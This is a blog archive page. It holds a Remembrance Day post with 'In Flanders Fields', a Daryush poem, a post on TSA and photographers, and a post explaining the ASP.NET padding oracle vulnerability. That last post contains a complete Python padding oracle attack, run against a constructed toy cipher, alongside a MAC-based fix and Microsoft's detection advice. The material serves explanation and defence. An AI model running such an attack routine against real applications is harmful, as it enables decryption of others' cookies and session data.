Category Archives: Poetry

Eleventh hour of the eleventh day of the eleventh month

Today marks Armistice Day, the anniversary of the 1918 armistice with Germany that ended hostilities on the Western Front in World War I.

It also is known as Veterans Day in the US, thanks to sentiment from Kansas, as I have written before.

Poppies are used for remembrance in reference to Flanders, one of the most heavily contested areas of Europe, which lay between areas of French, German and British control. The flowers grew all around the battlefields and expanding cemeteries of Belgium.

A poem called “In Flanders Fields” was written by Canadian Lieutenant-Colonel John McCrae, a physician serving there, and published in 1915:

In Flanders fields the poppies blow
      Between the crosses, row on row,
   That mark our place; and in the sky
   The larks, still bravely singing, fly
Scarce heard amid the guns below.

We are the Dead. Short days ago
We lived, felt dawn, saw sunset glow,
   Loved and were loved, and now we lie,
         In Flanders fields.

Take up our quarrel with the foe:
To you from failing hands we throw
   The torch; be yours to hold it high.
   If ye break faith with us who die
We shall not sleep, though poppies grow
         In Flanders fields.


Poster from the Canadian War Department

The reference to crosses is not universal for more reasons than one might expect. Today the German news points out that some of the dead are treated differently from the other casualties in Flanders.

The Langemark cemetery is the final resting place of 44,294 German soldiers. More than half of them are buried in one mass grave, the Kameraden Grab, their names etched on large dark plaques running alongside the site.

[Andre de Bruin, a World War I guide and founder of Over The Top Tours] points to rows of gravestones that lie flat on the ground, explaining: “Belgium imposed very strict restrictions on German memorials. Headstones were not allowed to stand, not like those of the Commonwealth soldiers and there were many other rules that applied only to Germans.”

There were hundreds of burial sites of German soldiers after 1918 but in the 1950s, Belgium ordered that the bodies be regrouped in no more than four sites, of which Langemark is one.

“It was probably done out of hatred for what happened, especially during World War II when Belgium was occupied. They even forbade the use of crosses above the headstones,” de Bruin said.

Children of Wealth in Your Warm Nursery

by Elizabeth Daryush, as mentioned in Poetry Magazines

Children of wealth in your warm nursery,
Set in the cushioned window-seat to watch
The volleying snow, guarded invisibly
By the clear double pane through which no touch
Untimely penetrates, you cannot tell
What winter means; its cruel truths to you
Are only sound and sight; your citadel
Is safe from feeling, and from knowledge too.

Go down, go out to elemental wrong,
Waste your too round limbs, tan your skin too white;
The glass of comfort, ignorance, seems strong
To-day, and yet perhaps this very night
You’ll wake to horror’s wrecking fire—your home
Is wired within for this, in every room.

ASP.NET Padding Oracle Attack

Cryptographic keys can be stolen from ASP.NET web applications by modifying encrypted cookies (or other ciphertext the application accepts) and reviewing the resulting errors: the server reveals whether the tampered ciphertext decrypted to valid padding, and that single bit per request is enough to decrypt the ciphertext byte by byte without ever learning the key. It is an information disclosure vulnerability arising from a side channel attack. This video shows the Padding Oracle Exploit Tool (POET) in action:

Details can be found here: Padding Oracle Crypto Attack (POCA)

The attack allows someone to decrypt sniffed cookies, which could contain valuable data such as bank balances, Social Security numbers or crypto keys. The attacker may also be able to create authentication tickets for a vulnerable Web app and abuse other processes that use the application’s crypto API.

[…]

If the padding is invalid, the error message that the sender gets will give him some information about the way that the site’s decryption process works. Rizzo and Duong said that the attack is reliable 100 percent of the time on ASP.NET applications, although the time to success can vary widely. The real limiting resources in this attack are the speed of the server and the bandwidth available.

They say the longest attack time so far has been just 50 minutes. They do not say how long it takes to fix a site and close the attack path.

Microsoft is investigating and discussing a fix. Since it is an information disclosure vulnerability I expect they will enhance the ability to redirect or completely suppress errors. They also may add some randomness to error responses to reduce timing attacks — attempts to guess information from the time it takes to respond. Either way, it was already a best practice to suppress errors to prevent information disclosure.

Edited to add (Sep 28th):

  1. Here is a great introduction to Padding Oracle Attack, including Python code
  2. Microsoft has released a patch, which has to be manually installed from their download center. They also give the following recommendations, as I predicted above:

Until the patch has been installed, administrators should configure servers to only respond with a single error page, meaning that all server errors should return the same error page so that an attacker would not be able to determine which part of their request was deciphered properly. In addition to this, modify the Page_Load() function within the custom error page to pause for a short random sleep delay before sending the error response.

Administrators should watch for errors with the following message: “CryptographicException” and/or “Padding is invalid and cannot be removed” as these could be an indicator that an attacker may be trying to exploit this vulnerability against an IIS server.
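A worked example of the mechanism described in this post, added here as illustration: it is not code from the original post, from Rizzo and Duong's POET, or from Microsoft. The block cipher is a 4-round Feistel network keyed with HMAC-SHA256 standing in for AES so the example runs on the Python standard library alone; the attack needs only CBC mode, PKCS#7 padding and a yes/no oracle, so it applies unchanged to AES-CBC. `KEY`, `MAC_KEY` and the sample plaintext mentioned below are constructed for the demo. `vulnerable_oracle` behaves like a server whose padding failure is distinguishable from success; `padding_oracle_attack` turns that one bit per request into the full plaintext, working backwards one byte at a time through each block. `hardened_oracle` goes beyond the single-error-page workaround quoted from Microsoft and shows the fix I would actually recommend: authenticate the ciphertext (encrypt-then-MAC) before any padding is examined and answer every failure identically, so there is no oracle left to query.

```python
# Added illustration of the padding oracle attack; not the original post's code, not POET.
# A 4-round HMAC-SHA256 Feistel network stands in for AES (stdlib only); the attack itself
# needs only CBC + PKCS#7 + a yes/no oracle, so it applies as-is to AES-CBC.
import hashlib
import hmac
import os

BLOCK = 16
KEY = b"constructed-demo-key-do-not-reuse"       # constructed demo key
MAC_KEY = b"constructed-demo-mac-key-separate!"  # constructed; hardened variant only
PADDING_ERROR = "Padding is invalid and cannot be removed."

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _feistel(block: bytes, rounds) -> bytes:
    """Balanced Feistel network; decrypting is the same walk with rounds reversed."""
    l, r = block[:BLOCK // 2], block[BLOCK // 2:]
    for rnd in rounds:
        f = hmac.new(KEY, bytes([rnd]) + r, hashlib.sha256).digest()[:BLOCK // 2]
        l, r = r, _xor(l, f)
    return r + l

def pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError(PADDING_ERROR)
    return data[:-n]

def cbc_encrypt(plaintext: bytes) -> bytes:
    prev = os.urandom(BLOCK)
    out, padded = [prev], pad(plaintext)
    for i in range(0, len(padded), BLOCK):
        prev = _feistel(_xor(padded[i:i + BLOCK], prev), range(4))
        out.append(prev)
    return b"".join(out)                         # iv || c1 || c2 || ...

def cbc_decrypt(data: bytes) -> bytes:
    if len(data) < 2 * BLOCK or len(data) % BLOCK:
        raise ValueError(PADDING_ERROR)
    prev, out = data[:BLOCK], []
    for i in range(BLOCK, len(data), BLOCK):
        out.append(_xor(_feistel(data[i:i + BLOCK], reversed(range(4))), prev))
        prev = data[i:i + BLOCK]
    return unpad(b"".join(out))

def vulnerable_oracle(data: bytes) -> bool:
    """Server whose padding failure is distinguishable from success: the bug."""
    try:
        cbc_decrypt(data)
        return True
    except ValueError:
        return False

def padding_oracle_attack(oracle, data: bytes) -> bytes:
    """Recover the plaintext of iv||ct using only the oracle's yes/no per query."""
    blocks = [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]
    recovered = b""
    for prev, target in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)                 # will hold D_k(target)
        for pos in range(BLOCK - 1, -1, -1):
            padval = BLOCK - pos
            crafted = bytearray(BLOCK)           # plays the role of the IV
            for j in range(pos + 1, BLOCK):      # known tail forced to padval
                crafted[j] = inter[j] ^ padval
            for guess in range(256):
                crafted[pos] = guess
                if not oracle(bytes(crafted) + target):
                    continue
                if pos == BLOCK - 1:             # rule out a pad longer than 0x01
                    crafted[pos - 1] ^= 0xFF
                    still_ok = oracle(bytes(crafted) + target)
                    crafted[pos - 1] ^= 0xFF
                    if not still_ok:
                        continue
                inter[pos] = guess ^ padval
                break
            else:
                raise RuntimeError("oracle gives no signal; attack fails")
        recovered += _xor(bytes(inter), prev)
    return unpad(recovered)

def seal(plaintext: bytes) -> bytes:
    """Encrypt-then-MAC; the tag covers iv || ct, so any bit flip is caught first."""
    body = cbc_encrypt(plaintext)
    return body + hmac.new(MAC_KEY, body, hashlib.sha256).digest()

def hardened_oracle(data: bytes) -> bool:
    """Tampering is rejected before padding is examined; every failure looks the same."""
    body, tag = data[:-32], data[-32:]
    if not hmac.compare_digest(hmac.new(MAC_KEY, body, hashlib.sha256).digest(), tag):
        return False
    try:
        cbc_decrypt(body)
        return True
    except ValueError:
        return False
```

Run `padding_oracle_attack(vulnerable_oracle, cbc_encrypt(b"user=alice;role=admin;balance=1234"))` (a constructed cookie value) and the full plaintext comes back with at most 256 requests per byte, roughly 12,300 requests for three blocks in the worst case, which is why the quoted article names server speed and bandwidth as the limiting resources rather than any cryptographic difficulty. Against `hardened_oracle` every crafted request fails the MAC check before decryption, the oracle answers uniformly, and the attack raises `RuntimeError` having learned nothing; a single uniform error page removes the message-content channel the same way, but only the MAC check also closes the timing channel the workaround tries to blur with a random sleep.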

TSA focus on photographers

The TSA has built a bit of a legacy of annoying photographers. I have been hassled personally and I sometimes hear of others getting the same treatment.

Their official spokesman online, Blogger Bob, has responded to recent outrage about the following poster intended for an anti-terror awareness campaign.

The most important part of the blog post, aside from explaining the actual intention of the poster, is to say that photographers can be an asset to security.

In fact, many photographers would be prime candidates to use such vigilance programs to report suspicious activity since they’re extremely observant of their surroundings.

Bingo! The poster did a poor job characterizing the threat as someone doing something entirely legal and NOT suspicious — taking a photograph — when it instead could have called upon photographers to be an asset to the TSA. Wired’s response to this is “Nice save, Bob”

I have tried to make fun of this kind of anti-terror campaign before. The latest TSA attempt is almost funnier than my bogus ones! I clearly will have to try harder.

Old attempt:

New attempt:

Even if it isn’t funny, at least I managed to get a haiku in my poster.

Joe Pries Aviation points out that in Europe photographers are given a “great spot from where to safely photograph (free of charge).”

Does anyone see anything but pure terror here? Scary photo.